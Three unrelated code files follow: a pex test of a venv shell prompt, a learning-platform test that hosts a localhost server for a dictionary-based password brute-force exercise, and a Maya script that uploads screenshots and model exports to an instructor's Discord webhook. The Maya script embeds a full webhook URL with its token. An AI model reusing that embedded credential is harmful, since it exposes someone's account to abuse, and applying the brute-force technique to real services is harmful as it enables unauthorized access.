venv_pex = os.path.join(str(tmpdir), "venv.pex")
run_pex_command(
args=[
"--pex-root",
pex_root,
"--runtime-pex-root",
pex_root,
"-o",
venv_pex,
"--include-tools",
]
).assert_success()
venv_dir = os.path.join(str(tmpdir), "venv_dir")
subprocess.check_call(
args=[venv_pex, "venv", "--prompt", "jane", venv_dir], env=make_env(PEX_TOOLS=True)
)
if PY_VER == (2, 7) or IS_PYPY:
# Neither CPython 2.7 not PyPy interpreters have (functioning) venv modules; so we create
# their venvs with an old copy of virtualenv that does not surround the prompt with parens.
expected_prompt = "jane"
elif PY_VER == (3, 5):
# We can't set the prompt for CPython 3.5 so we expect the name of the venv dir.
expected_prompt = "(venv_dir)"
else:
expected_prompt = "(jane)"
output = subprocess.check_output(
args=[
"/usr/bin/env",
"bash",
"-c",
"source {} && echo $PS1".format(os.path.join(venv_dir, "bin", "activate")),
],
env=make_env(TERM="dumb", COLS=80),
)
assert expected_prompt == output.decode("utf-8").strip()
|
tests.py
|
from hstest.stage_test import StageTest
from hstest.test_case import TestCase
from hstest.check_result import CheckResult
from threading import Thread
from time import sleep
import socket
import random
CheckResult.correct = lambda: CheckResult(True, '')
CheckResult.wrong = lambda feedback: CheckResult(False, feedback)
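# Convenience constructors used by check() below to build pass/fail results.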
abc = 'abcdefghijklmnopqrstuvwxyz1234567890'
passwords = [
    'chance', 'frankie', 'killer', 'forest', 'penguin',
    'jackson', 'rangers', 'monica', 'qweasdzxc', 'explorer',
'gabriel', 'chelsea', 'simpsons', 'duncan', 'valentin',
'classic', 'titanic', 'logitech', 'fantasy', 'scotland',
'pamela', 'christin', 'birdie', 'benjamin', 'jonathan',
'knight', 'morgan', 'melissa', 'darkness', 'cassie'
]
def generate_password():
    '''Generator yielding each password from the dictionary, stripped and lower-cased.'''
for password in passwords:
yield password.rstrip().lower()
def random_password():
    '''Pick a random password from the dictionary and randomize the case of its letters.'''
pas = random.choice(list(generate_password()))
uppers = []
for i in range(len(pas)):
uppers.append(random.randint(0, 1))
return ''.join(
pas[j].upper() if uppers[j] == 1
else pas[j]
for j in range(len(pas)))
class Hacking(StageTest):
def __init__(self, module):
super().__init__(module)
self.ready = False
self.sock = None
self.serv = None
self.connected = False
self.message = []
self.password = None
def start_server(self):
self.serv = Thread(target=lambda: self.server())
self.serv.start()
self.ready = False
while not self.ready:
try:
sleep(0.1) # socket needs to be set up before test
except KeyboardInterrupt:
pass
def stop_server(self):
self.sock.close()
self.serv.join()
def server(self):
        '''Create the server socket and answer connecting clients.'''
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.sock.bind(('localhost', 9090))
self.ready = True
try:
self.sock.listen(1)
conn, addr = self.sock.accept()
self.connected = True
conn.settimeout(15)
while True:
data = conn.recv(1024)
self.message.append(data.decode('utf8'))
if len(self.message) > 1_000_000:
conn.send('Too many attempts to connect!'.encode('utf8'))
break
if not data:
break
if data.decode('utf8') == self.password:
conn.send('Connection success!'.encode('utf8'))
break
else:
conn.send('Wrong password!'.encode('utf8'))
conn.close()
except:
pass
def generate(self):
self.message = []
self.password = random_password()
self.start_server()
return [TestCase(args=['localhost', '9090'],
attach=[self.password])]
def check(self, reply, attach):
self.stop_server()
if not self.connected:
return CheckResult.wrong("You didn't connect to the server")
real_password = attach[0]
printed_password = reply.split('\n')[0]
if reply.split('\n')[0] != real_password:
return CheckResult.wrong(
'The password you printed is not correct\n'
'You printed: \"' + printed_password + '\"\n'
'Correct password: \"' + real_password + '\"'
)
return CheckResult.correct()
if __name__ == '__main__':
test = Hacking('hacking.hack')
test.run_tests()
test.stop_server()
|
vfs_m1_screenshot_sender.py
|
"""
This script has been modified for Modeling 1.
GT Screenshot Sender - Send images to your instructor.
@Guilherme Trevisan - TrevisanGMW@gmail.com - 2021-01-05 - github.com/TrevisanGMW
Tested on Maya 2018, 2019, 2020 - Windows 10
1.1 - 2021-01-12
Changed method to viewport only for better compatibility
1.2 - 2021-06-01
Made script compatible with Python 3 (Maya 2022+)
"""
try:
from shiboken2 import wrapInstance
except ImportError:
from shiboken import wrapInstance
try:
from PySide2 import QtWidgets, QtGui, QtCore
from PySide2.QtGui import QIcon
from PySide2.QtWidgets import QWidget
except ImportError:
from PySide import QtWidgets, QtGui, QtCore
from PySide.QtGui import QIcon, QWidget
try:
from httplib2 import Http
except ImportError:
import http.client
import maya.OpenMayaUI as omui
import maya.utils as utils
import maya.OpenMaya as om
import maya.cmds as cmds
import maya.mel as mel
import threading
import urllib
import base64
import socket
import datetime
import mimetypes
import random
import string
import copy
import time
import sys
import os
from json import dumps
from json import loads
# Forced Webhook
hard_coded_webhook = 'https://discord.com/api/webhooks/XXXX'
hard_coded_webhook = 'https://discord.com/api/webhooks/843586759425523714/RB5ILSBzvgnLkFvEOAEx_NK2EQYbgVerZhA0VWysZ_Ydml6vZ9TD1PBhi3YT7Tfp1Dlq'
hard_coded_webhook_name = 'Instructor'
# Script Name
script_name = "Screenshot Sender"
# Versions:
script_version = "1.2"
maya_version = cmds.about(version=True)
# Python Version
python_version = sys.version_info.major
# Used to define multipart/form-data boundary
_BOUNDARY_CHARS = string.digits + string.ascii_letters
# Settings
gt_mtod_settings_submit_ss = { 'discord_webhook':hard_coded_webhook,
'discord_webhook_name' : hard_coded_webhook_name,
'is_first_time_running' : False,
'custom_username' : '',
'image_format' : 'jpg',
'video_format' : 'mov',
'video_scale_pct' : 40,
'video_compression' : 'Animation',
'video_output_type' : 'qt',
'is_new_instance' : True,
'is_webhook_valid' : False,
'feedback_visibility' : True,
'timestamp_visibility' : True }
# Default Settings (Deep Copy)
gt_mtod_settings_submit_ss_default = copy.deepcopy(gt_mtod_settings_submit_ss)
def build_gui_submit_screenshot():
''' Builds the Main GUI for the script '''
window_name = "build_gui_submit_screenshot"
if cmds.window(window_name, exists =True):
cmds.deleteUI(window_name)
# Main GUI Start Here =================================================================================
# Build UI
build_gui_submit_screenshot = cmds.window(window_name, title=' ' + script_name + " - v" + script_version,\
titleBar=True, mnb=False, mxb=False, sizeable =True)
cmds.window(window_name, e=True, s=True, wh=[1,1])
column_main = cmds.columnLayout()
form = cmds.formLayout(p=column_main)
content_main = cmds.columnLayout(adj = True)
# Title Text
cmds.separator(h=10, style='none') # Empty Space
cmds.rowColumnLayout(nc=1, cw=[(1, 270)], cs=[(1, 10)], p=content_main) # Window Size Adjustment
cmds.rowColumnLayout(nc=4, cw=[(1, 10), (2, 250)], cs=[(1, 10), (2, 0), (3, 0)], p=content_main) # Title Column
cmds.text(" ", bgc=[.4,.4,.4], h=25) # Tiny Empty Green Space
cmds.text(script_name, bgc=[.4,.4,.4], fn="boldLabelFont")
cmds.separator(h=5, style='none') # Empty Space
# Body ====================
body_column = cmds.rowColumnLayout(nc=1, cw=[(1, 260)], cs=[(1,10)], p=content_main)
# Generate Images
# Icon
icons_folder_dir = cmds.internalVar(userBitmapsDir=True)
icon_image = ':/camera.open.svg'
# Send Desktop Icon
send_desktop_btn_ico = icons_folder_dir + 'gt_mtod_send_desktop.png'
if os.path.isdir(icons_folder_dir) and os.path.exists(send_desktop_btn_ico) == False:
image_enconded = 'iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAACXBIWXMAAAsTAAALEwEAmpwYAAAF8WlUWHRYTUw6Y29tLmFkb2JlLnhtcAAAAAAAPD94cGFja2V0IGJlZ2luPSLvu78iIGlkPSJXNU0wTXBDZWhpSHpyZVN6TlRjemtjOWQiPz4gPHg6eG1wbWV0YSB4bWxuczp4PSJhZG9iZTpuczptZXRhLyIgeDp4bXB0az0iQWRvYmUgWE1QIENvcmUgNS42LWMxNDggNzkuMTY0MDM2LCAyMDE5LzA4LzEzLTAxOjA2OjU3ICAgICAgICAiPiA8cmRmOlJERiB4bWxuczpyZGY9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkvMDIvMjItcmRmLXN5bnRheC1ucyMiPiA8cmRmOkRlc2NyaXB0aW9uIHJkZjphYm91dD0iIiB4bWxuczp4bXA9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC8iIHhtbG5zOmRjPSJodHRwOi8vcHVybC5vcmcvZGMvZWxlbWVudHMvMS4xLyIgeG1sbnM6cGhvdG9zaG9wPSJodHRwOi8vbnMuYWRvYmUuY29tL3Bob3Rvc2hvcC8xLjAvIiB4bWxuczp4bXBNTT0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wL21tLyIgeG1sbnM6c3RFdnQ9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9zVHlwZS9SZXNvdXJjZUV2ZW50IyIgeG1wOkNyZWF0b3JUb29sPSJBZG9iZSBQaG90b3Nob3AgMjEuMCAoV2luZG93cykiIHhtcDpDcmVhdGVEYXRlPSIyMDIwLTExLTAzVDExOjU1OjM4LTA4OjAwIiB4bXA6TW9kaWZ5RGF0ZT0iMjAyMC0xMS0wM1QxMjoyNzoxMi0wODowMCIgeG1wOk1ldGFkYXRhRGF0ZT0iMjAyMC0xMS0wM1QxMjoyNzoxMi0wODowMCIgZGM6Zm9ybWF0PSJpbWFnZS9wbmciIHBob3Rvc2hvcDpDb2xvck1vZGU9IjMiIHBob3Rvc2hvcDpJQ0NQcm9maWxlPSJzUkdCIElFQzYxOTY2LTIuMSIgeG1wTU06SW5zdGFuY2VJRD0ieG1wLmlpZDpiZTc1ODU2NC04YThkLTQ2NDUtYmU2Yy1lMmY5ZmQwMWU0YjgiIHhtcE1NOkRvY3VtZW50SUQ9ImFkb2JlOmRvY2lkOnBob3Rvc2hvcDozYjViOWNhMy1lODgwLTgxNGQtYmFjOS1mNTNmNDExMWQ0MDciIHhtcE1NOk9yaWdpbmFsRG9jdW1lbnRJRD0ieG1wLmRpZDo5MGM2ZTQ5My0xZDNkLTNiNGQtODI0ZS1kN2JhZDRlNzQ1MzQiPiA8eG1wTU06SGlzdG9yeT4gPHJkZjpTZXE+IDxyZGY6bGkgc3RFdnQ6YWN0aW9uPSJjcmVhdGVkIiBzdEV2dDppbnN0YW5jZUlEPSJ4bXAuaWlkOjkwYzZlNDkzLTFkM2QtM2I0ZC04MjRlLWQ3YmFkNGU3NDUzNCIgc3RFdnQ6d2hlbj0iMjAyMC0xMS0wM1QxMTo1NTozOC0wODowMCIgc3RFdnQ6c29mdHdhcmVBZ2VudD0iQWRvYmUgUGhvdG9zaG9wIDIxLjAgKFdpbmRvd3MpIi8+IDxyZGY6bGkgc3RFdnQ6YWN0aW9uPSJzYXZlZCIgc3RFdnQ6aW5zdGFuY2VJRD0ieG1wLmlpZDpiZTc1ODU2NC04YThkLTQ2NDUtYmU2Yy1lMmY5ZmQwMWU0YjgiIHN0RXZ0OndoZW49IjIwMjAtMTEtMDNUMTI6Mjc6MTItMDg6MDAiIHN0RXZ0OnNvZnR3YXJlQWdlbnQ9IkFkb2JlIFBob3Rvc2hvcCAyMS4wIChXaW5kb3dzKSIgc3RFdnQ6Y2hhbmdlZD0iLyIvPiA8L3JkZjpTZXE+IDwveG1wTU06SGlzdG9yeT4gPC9yZGY6RGVzY3JpcHRpb24+IDwvcmRmOlJERj4gPC94OnhtcG1ldGE+IDw/eHBhY2tldCBlbmQ9InIiPz7PHrkDAAAFDklEQVRYhe2XT2gUVxzHP+/N7M5kdetG6+ISY1sRak38Q7L9RwyUhlioh4aI1nry3EKgiKcWUS8tVQjkkAZbpLSRVg/anEzFYGJzsU5AAqUhpUuyQdckWje7+bPZnZnXQ3bDanbWikUv/Z5m5v3e+33e7733e78RSimep/ShoaH9QBOQAZ4FjQ5kgV/r6+t/1oEjruvWAdozcA6A4zhOIpE4EI1G0YG6qakpZ3BwUOq6LmzbRgjh2VkIUbJdKcXjllNKiWEYNDc3+zZs2LAR+FQH1JUrV/xdXV0xKeVV13V9QA7wplhqkyW+u5RZRiklVVVVq2tqat6LRCIvAm/oAJqmKV3Xe/r7+6uEEE1CCD/gPMa5KnqnjD2AVErds237m4GBgW8jkcg1YC0sbQiy2SyVlZWmlPJgJpPJ3rx5UxmGoQkhSs4mH+oVESplr5RCCEF9fX1ofHz85IkTJ+jv7884jgOg9EJoNE3LAvT09PhPnTqVBK4Bq8rMqhRcyWULBALi3Llzb7muG3Qc50MppZ0HWIpAXhLAMAyAHyzLaivjfFnRaPSxNtevXw8qpX6LxWKbWDpt9kNOAdRSXFV+h1f8G+dPIqWUVErJYucPATyicifgP5UXwDPT/wArAMql4adUyYFXACwsLHgaP4XmgYyUKwOuw3K2EoCorKxk27ZtGvBqmQGXR7Isq/DolrEPSCkDuq4X+i4fxeVMaNu2C7Bnzx62b9/eksvl3lFKlYyEEIISbV6XkBJCSJ/PVz07O5sB/CsAbNvmzp07i1NTUx/39vZ2GoaxxjRN23XdkjWCKLFRXNcteRcUNDs7+2BwcLBS1/VU8bWtAyIUColIJKKFw+GvOzo65oBawKR8WL2uY09pmpY+dOhQDDhSmIOwLEtls1nu379/LxwOT2iatoD3JtTyTh7k3yuANBAAVrO0DOWqEiNvuxUgGo1mdOBYX1/fSb/fvzYWi2n5imfFTKSUpNNpx3EcGhsb1/n9fjE5OTlXVVUVjMfjMyMjI2nTNCt8Pp/wgsiHXqbT6eTo6GgIMHXgi66uropMJrNFKeXLd14RgVwup9LptLtv377Vzc3NzRcuXMidP3/e6OjoWDRNc017e/v49PT0YCgUWi+l9HtBSClxXZdUKvU3MKoD9u3bt48BL1BmDY8ePbqupaWlzTCMg8lkcrS7u3vL3bt3OxKJxPDOnTvPdnZ2vhYIBL7fu3fvJ0CQ8kWuyPuaFUXnuFgm0AC8DmwCaoBXgOrh4eGR48ePr4/H46PAQSDe1tZ2ZPfu3V9t3rxZptPpqWAwaAG/AxPAQDQaHfYk8QDYqpT6BdgohJDz8/OZoaGh1KVLl8StW7fWp1Kpn4DPLcv6q1CQNDU1tYbD4Y6Ghoaquro65ff7RS6XyyUSiT9bW1s/AkpC6
KU+AqYQYtPAwMD86dOnjUwmY87Nzc1ls9leoBu4YVnWg+IOfX19F4EbV69e/cDn8x0A3jxz5oxp2/ZW4Evg/ScBACAYDAZ27NgxcPjw4YvBYFCEQqFF0zSrgZdYWkdlWVZxVayA+ZmZmbPT09PfhcPh9rGxsVVAtZcPL4DU4uLi2K5du16ura1t1HX97bxD4bplc00BXAWDQaSUvrGxsSxlNrcXwGQ8Hu+cmJj4LJlMviCEkHkAz7+fR7KzkFKilHIuX77sB/7wAhCFur2EVgH7gXdZuk6L5ZXtHh2o8APzI9DvCfA89Q9+dgWL9W/IeAAAAABJRU5ErkJggg=='
image_64_decode = base64.decodestring(image_enconded)
image_result = open(send_desktop_btn_ico, 'wb')
image_result.write(image_64_decode)
image_result.close()
if os.path.exists(send_desktop_btn_ico) == False:
send_desktop_btn_ico = 'fluidGetExamples.png'
cmds.separator(h=5)
cmds.separator(h=7, style='none') # Empty Space
cmds.rowColumnLayout(nc=2, cw=[(1, 100),(2, 143),(4, 37)], cs=[(1, 18),(2, 0),(3, 0),(4, 0)], p=content_main)
    cmds.text(l='Webhook Name:', align="center", fn="boldLabelFont")
webhook_name_text = cmds.text(l='...', align="center", fn="tinyBoldLabelFont")
cmds.separator(h=7, style='none') # Empty Space
cmds.rowColumnLayout(nc=3, cw=[(1, 100),(2, 50),(3, 100),(4, 50)], cs=[(1, 10),(2, 0),(3, 0),(4, 0)], p=content_main)
cmds.text(l='Web Response:', align="center", fn="boldLabelFont")
status_code_text = cmds.text(l='', align="center")
status_message_text = cmds.text(l='', align="center")
if gt_mtod_settings_submit_ss['is_first_time_running'] == True:
cmds.text(webhook_name_text, e=True, l=hard_coded_webhook_name)#, bgc= [1,1,0]) # MODIFIED
else:
if 'Error' in gt_mtod_settings_submit_ss.get('discord_webhook_name') or 'Missing Webhook' in gt_mtod_settings_submit_ss.get('discord_webhook_name'):
cmds.text(webhook_name_text, e=True, l=gt_mtod_settings_submit_ss.get('discord_webhook_name'), bgc=[.5,0,0])
else:
cmds.text(webhook_name_text, e=True, l=gt_mtod_settings_submit_ss.get('discord_webhook_name'), nbg=True)
cmds.rowColumnLayout(nc=1, cw=[(1, 260)], cs=[(1, 10)], p=content_main)
cmds.separator(h=7, style='none') # Empty Space
cmds.separator(h=5)
stored_username_exists = cmds.optionVar(exists=("gt_submit_message_username"))
if stored_username_exists:
try:
stored_username = str(cmds.optionVar(q=("gt_submit_message_username")))
except:
stored_username = ''
else:
stored_username = ''
cmds.separator(h=7, style='none') # Empty Space
attached_message_txtfield = cmds.textField(pht='Type your name or nickname here...', text=stored_username, cc=lambda x:store_name(cmds.textField(attached_message_txtfield, q=True, text=True)))
cmds.separator(h=10, style='none') # Empty Space
def store_name(name):
cmds.optionVar( sv=('gt_submit_message_username', name) )
screenshot_btn_color = [.4,.4,.4]
cmds.rowColumnLayout(nc=1, cw=[(1, 260),(2, 1),(3, 5)], cs=[(1, 10),(2, 0),(3, 0)], p=content_main)
send_desktop_btn = cmds.iconTextButton( style='iconAndTextVertical', image1=send_desktop_btn_ico, label='Send Screenshot to Instructor',\
                                            statusBarMessage='This button will take a screenshot and send it to your instructor.',\
olc=[1,0,0] , enableBackground=True, bgc=screenshot_btn_color, h=80,\
command=lambda: send_maya_window())
cmds.separator(h=2, style='none') # Empty Space
cmds.separator(h=10, style='none') # Empty Space
# Functions for the buttons -----------
def get_date_time_message():
'''
        Returns a formatted string of the current date and time to be used as a message
        Returns:
            date_and_time (str): A formatted string containing the current date and time.
'''
now = datetime.datetime.now()
return now.strftime("Date: %m/%d/%Y - Time: %H:%M:%S")
def get_username(ignore_machine=False):
'''
        Returns a string to be used as the username, extracted from the computer's username.
        A custom username may be stored, in which case the function returns the custom username followed by the computer's username.
Returns:
username (str): A string composed of custom username (if it exists) and the computer's username
'''
stored_username_exists = cmds.optionVar(exists=("gt_submit_message_username"))
if stored_username_exists:
try:
stored_username = str(cmds.optionVar(q=("gt_submit_message_username")))
except:
stored_username = ''
user_name = stored_username + ' (' + socket.gethostname() + ')'
if ignore_machine:
return user_name
else:
return stored_username
def update_text_status(error=False):
'''
Updates UI texts to say "Uploading" or "Error"
Parameters:
            error (bool): If True, the status is shown in red as an error; otherwise it is shown in yellow as "Uploading". Default = False (Uploading)
'''
if not error:
cmds.text(status_message_text, e=True, l='Uploading', bgc=(1, 1, 0))
cmds.text(status_code_text, e=True, l='...', bgc=(1, 1,0))
else:
cmds.text(status_message_text, e=True, l='...', bgc=(.5, 0, 0))
cmds.text(status_code_text, e=True, l='Error', bgc=(.5, 0, 0))
def clear_attached_message(response):
'''
Clears the attached message when a success code is received
Parameters:
response (dict): A dictionary response received from a HTTP object after post/get operation.
'''
if len(response) >= 1:
status_value = response[0].status
success_codes = [200, 201, 202, 203, 204, 205, 206]
if status_value in success_codes:
pass#cmds.textField(attached_message_txtfield, e=True, text='')
def parse_sending_response(response):
'''
Processes response received when sending an image/video and updates UI text accordingly
Parameters:
response (dict): A dictionary response received from a HTTP object after post/get operation.
'''
if len(response) >= 1:
status_value = response[0].status
reason_value = response[0].reason
success_codes = [200, 201, 202, 203, 204, 205, 206]
if status_value in success_codes:
cmds.text(status_message_text, e=True, l=reason_value, bgc=(0, 0.5, 0))
cmds.text(status_code_text, e=True, l=status_value, bgc=(0, 0.5,0))
else: # Error
cmds.text(status_message_text, e=True, l=reason_value, bgc=(0.5, 0, 0))
cmds.text(status_code_text, e=True, l=status_value, bgc=(0.5, 0,0))
else :
cmds.text(status_message_text, e=True, l='Can\'t read response', bgc=(0.5, 0,0))
cmds.text(status_code_text, e=True, l='Can\'t read response', bgc=(0.5, 0,0))
def attached_text_message(operation_name, response):
'''
Attaches message to the content sent according the response received and the content of the message.
Parameters:
operation_name (string): Name of the operation, used to write an output message.
response (dict): A dictionary response received from a HTTP object after post/get operation. (This should be the response of the previous operation)
'''
if len(response) >= 1:
status_value = response[0].status
success_codes = [200, 201, 202, 203, 204, 205, 206]
if status_value in success_codes:
try:
upload_message = cmds.textField(attached_message_txtfield, q=True, text=True)
if upload_message.strip() != '':
def threaded_upload():
try:
discord_post_message(get_username(), upload_message, gt_mtod_settings_submit_ss.get('discord_webhook'))
utils.executeDeferred(response_inview_feedback, operation_name, response, display_inview=gt_mtod_settings_submit_ss.get('feedback_visibility'))
utils.executeDeferred(clear_attached_message, response)
except Exception as e:
print(e)
thread = threading.Thread(None, target = threaded_upload)
thread.start()
else:
response_inview_feedback(operation_name, response, display_inview=gt_mtod_settings_submit_ss.get('feedback_visibility'))
except:
pass
def disable_buttons():
        ''' Disable buttons so the user doesn't accidentally send multiple requests at once '''
cmds.iconTextButton(send_desktop_btn, e=True, enable=False)
def enable_buttons():
''' Enable buttons after finishing previously requested function '''
cmds.iconTextButton(send_desktop_btn, e=True, enable=True)
# Button Functions ----------
webhook_error_message = 'Sorry, something went wrong. Please review your webhook and settings.'
def send_dekstop_screenshot():
''' Attempts to send a desktop screenshot using current settings '''
if gt_mtod_settings_submit_ss.get('is_new_instance'):
update_discord_webhook_validity(gt_mtod_settings_submit_ss.get('discord_webhook'))
if gt_mtod_settings_submit_ss.get('is_webhook_valid'):
try:
update_text_status()
temp_path = generate_temp_file(gt_mtod_settings_submit_ss.get('image_format'))
temp_desktop_ss_file = capture_desktop_screenshot(temp_path)
if gt_mtod_settings_submit_ss.get('timestamp_visibility'):
upload_message = get_date_time_message()
else:
upload_message = ''
def threaded_upload():
try:
utils.executeDeferred(disable_buttons)
response = discord_post_attachment(get_username(), upload_message, temp_desktop_ss_file, gt_mtod_settings_submit_ss.get('discord_webhook'))
utils.executeDeferred(enable_buttons)
utils.executeDeferred(parse_sending_response, response)
utils.executeDeferred('', 'desktop screenshot', response)
except:
update_text_status(error=True)
cmds.warning(webhook_error_message)
thread = threading.Thread(None, target = threaded_upload)
thread.start()
except:
update_text_status(error=True)
cmds.warning(webhook_error_message)
else:
cmds.warning(webhook_error_message)
def send_maya_window():
''' Attempts to send an image of the maya window using current settings '''
if gt_mtod_settings_submit_ss.get('is_new_instance'):
update_discord_webhook_validity(gt_mtod_settings_submit_ss.get('discord_webhook'))
if gt_mtod_settings_submit_ss.get('is_webhook_valid'):
try:
update_text_status()
temp_path = generate_temp_file(gt_mtod_settings_submit_ss.get('image_format'))
temp_img_file = capture_app_window(temp_path)
if gt_mtod_settings_submit_ss.get('timestamp_visibility'):
upload_message = get_date_time_message()
else:
upload_message = ''
def threaded_upload():
try:
utils.executeDeferred(disable_buttons)
response = discord_post_attachment(get_username(), upload_message, temp_img_file, gt_mtod_settings_submit_ss.get('discord_webhook'))
utils.executeDeferred(enable_buttons)
utils.executeDeferred(parse_sending_response, response)
utils.executeDeferred(attached_text_message, 'Maya window screenshot', response)
except:
update_text_status(error=True)
cmds.warning(webhook_error_message)
thread = threading.Thread(None, target = threaded_upload)
thread.start()
except:
update_text_status(error=True)
cmds.warning(webhook_error_message)
else:
cmds.warning(webhook_error_message)
def send_viewport_only():
''' Attempts to send an image of the active viewport using current settings '''
if gt_mtod_settings_submit_ss.get('is_new_instance'):
update_discord_webhook_validity(gt_mtod_settings_submit_ss.get('discord_webhook'))
if gt_mtod_settings_submit_ss.get('is_webhook_valid'):
try:
update_text_status()
temp_path = generate_temp_file(gt_mtod_settings_submit_ss.get('image_format'))
if maya_version in ['2017','2018','2019']:
temp_img_file = capture_viewport_playblast(temp_path)
else:
temp_img_file = capture_viewport(temp_path)
if gt_mtod_settings_submit_ss.get('timestamp_visibility'):
upload_message = get_date_time_message()
else:
upload_message = ''
def threaded_upload():
try:
utils.executeDeferred(disable_buttons)
response = discord_post_attachment(get_username(), get_username(True) + ' - ' + upload_message, temp_img_file, gt_mtod_settings_submit_ss.get('discord_webhook'))
utils.executeDeferred(enable_buttons)
utils.executeDeferred(parse_sending_response, response)
utils.executeDeferred('', 'viewport screenshot', response)
except:
update_text_status(error=True)
cmds.warning(webhook_error_message)
thread = threading.Thread(None, target = threaded_upload)
thread.start()
except:
update_text_status(error=True)
cmds.warning(webhook_error_message)
else:
cmds.warning(webhook_error_message)
def send_animated_playblast():
''' Attempts to record a playblast and upload it using the current settings '''
if gt_mtod_settings_submit_ss.get('is_new_instance'):
update_discord_webhook_validity(gt_mtod_settings_submit_ss.get('discord_webhook'))
if gt_mtod_settings_submit_ss.get('is_webhook_valid'):
try:
update_text_status()
current_scene_name = cmds.file(q=True, sn=True).split('/')[-1]
if current_scene_name == '': # If not saved
current_scene_name ='never_saved_untitled_scene'
else:
if current_scene_name.endswith('.ma') or current_scene_name.endswith('.mb'):
current_scene_name=current_scene_name[:-3]
temp_path = generate_temp_file( gt_mtod_settings_submit_ss.get('video_format'), file_name=current_scene_name)
disable_buttons() # This needs to happen before creating the playblast to avoid multiple clicks
temp_playblast_file = capture_playblast_animation(temp_path, gt_mtod_settings_submit_ss.get('video_scale_pct'), gt_mtod_settings_submit_ss.get('video_compression'), gt_mtod_settings_submit_ss.get('video_output_type') )
if gt_mtod_settings_submit_ss.get('timestamp_visibility'):
upload_message = get_date_time_message()
else:
upload_message = ''
def threaded_upload():
try:
response = discord_post_attachment(get_username(), upload_message, temp_playblast_file, gt_mtod_settings_submit_ss.get('discord_webhook'))
utils.executeDeferred(enable_buttons)
utils.executeDeferred(parse_sending_response, response)
utils.executeDeferred(attached_text_message, 'playblast', response)
except:
update_text_status(error=True)
cmds.warning(webhook_error_message)
utils.executeDeferred(enable_buttons)
finally:
utils.executeDeferred(enable_buttons)
thread = threading.Thread(None, target = threaded_upload)
thread.start()
except:
update_text_status(error=True)
cmds.warning(webhook_error_message)
enable_buttons()
else:
cmds.warning(webhook_error_message)
def send_message_only():
''' Attempts to send the message only (no images/videos) using current settings '''
if gt_mtod_settings_submit_ss.get('is_new_instance'):
update_discord_webhook_validity(gt_mtod_settings_submit_ss.get('discord_webhook'))
if gt_mtod_settings_submit_ss.get('is_webhook_valid'):
try:
upload_message = cmds.textField(attached_message_txtfield, q=True, text=True)
if upload_message.strip() != '':
update_text_status()
def threaded_upload():
try:
utils.executeDeferred(disable_buttons)
response = discord_post_message(get_username(), upload_message, gt_mtod_settings_submit_ss.get('discord_webhook'))
utils.executeDeferred(enable_buttons)
utils.executeDeferred(parse_sending_response, response)
utils.executeDeferred(response_inview_feedback, 'message', response, display_inview=gt_mtod_settings_submit_ss.get('feedback_visibility'))
utils.executeDeferred(clear_attached_message, response)
except:
update_text_status(error=True)
cmds.warning(webhook_error_message)
thread = threading.Thread(None, target = threaded_upload)
thread.start()
else:
cmds.warning('Your message is empty, please type something in case you want to send only a message.')
except:
update_text_status(error=True)
cmds.warning(webhook_error_message)
else:
cmds.warning(webhook_error_message)
def send_model_obj():
''' Attempts to export selected model as an OBJ file and upload it using the current settings '''
if gt_mtod_settings_submit_ss.get('is_new_instance'):
update_discord_webhook_validity(gt_mtod_settings_submit_ss.get('discord_webhook'))
if gt_mtod_settings_submit_ss.get('is_webhook_valid'):
selection = cmds.ls(selection=True)
if len(selection) > 0:
try:
update_text_status()
# Determine naming
if len(selection) == 1:
export_name = selection[-1]
else:
export_name = str(len(selection)).zfill(2) + '_selected_objects'
temp_path = generate_temp_file( 'obj', file_name=export_name)
disable_buttons()
temp_exported_obj = cmds.file(temp_path, pr=1, typ="OBJexport",es=1, f=True, op="groups=0; ptgroups=0; materials=0; smoothing=0; normals=0")
if gt_mtod_settings_submit_ss.get('timestamp_visibility'):
upload_message = get_date_time_message()
else:
upload_message = ''
def threaded_upload():
try:
response = discord_post_attachment(get_username(), upload_message, temp_exported_obj, gt_mtod_settings_submit_ss.get('discord_webhook'))
utils.executeDeferred(enable_buttons)
utils.executeDeferred(parse_sending_response, response)
utils.executeDeferred(attached_text_message, 'OBJ file', response)
except:
update_text_status(error=True)
cmds.warning(webhook_error_message)
utils.executeDeferred(enable_buttons)
finally:
utils.executeDeferred(enable_buttons)
thread = threading.Thread(None, target = threaded_upload)
thread.start()
except:
update_text_status(error=True)
cmds.warning(webhook_error_message)
enable_buttons()
else:
cmds.warning('Nothing selected. Please select what you want to send.')
else:
cmds.warning(webhook_error_message)
def send_model_fbx():
''' Attempts to export selected model as an FBX file and upload it using the current settings '''
if gt_mtod_settings_submit_ss.get('is_new_instance'):
update_discord_webhook_validity(gt_mtod_settings_submit_ss.get('discord_webhook'))
if gt_mtod_settings_submit_ss.get('is_webhook_valid'):
selection = cmds.ls(selection=True)
if len(selection) > 0:
try:
update_text_status()
# Determine naming
if len(selection) == 1:
export_name = selection[-1]
else:
export_name = str(len(selection)).zfill(2) + '_selected_objects'
temp_path = generate_temp_file( 'fbx', file_name=export_name)
disable_buttons()
cmds.FBXExport('-file', temp_path, '-s')
print(temp_path)
if gt_mtod_settings_submit_ss.get('timestamp_visibility'):
upload_message = get_date_time_message()
else:
upload_message = ''
def threaded_upload():
try:
response = discord_post_attachment(get_username(), upload_message, temp_path, gt_mtod_settings_submit_ss.get('discord_webhook'))
utils.executeDeferred(enable_buttons)
utils.executeDeferred(parse_sending_response, response)
utils.executeDeferred(attached_text_message, 'FBX file', response)
except:
update_text_status(error=True)
cmds.warning(webhook_error_message)
utils.executeDeferred(enable_buttons)
finally:
utils.executeDeferred(enable_buttons)
thread = threading.Thread(None, target = threaded_upload)
thread.start()
except:
update_text_status(error=True)
cmds.warning(webhook_error_message)
enable_buttons()
else:
cmds.warning('Nothing selected. Please select what you want to send.')
else:
cmds.warning(webhook_error_message)
# Show and Lock Window
cmds.showWindow(build_gui_submit_screenshot)
cmds.window(window_name, e=True, s=False)
# Set Window Icon
qw = omui.MQtUtil.findWindow(window_name)
if python_version == 3:
widget = wrapInstance(int(qw), QWidget)
else:
widget = wrapInstance(long(qw), QWidget)
icon = QIcon(icon_image)
widget.setWindowIcon(icon)
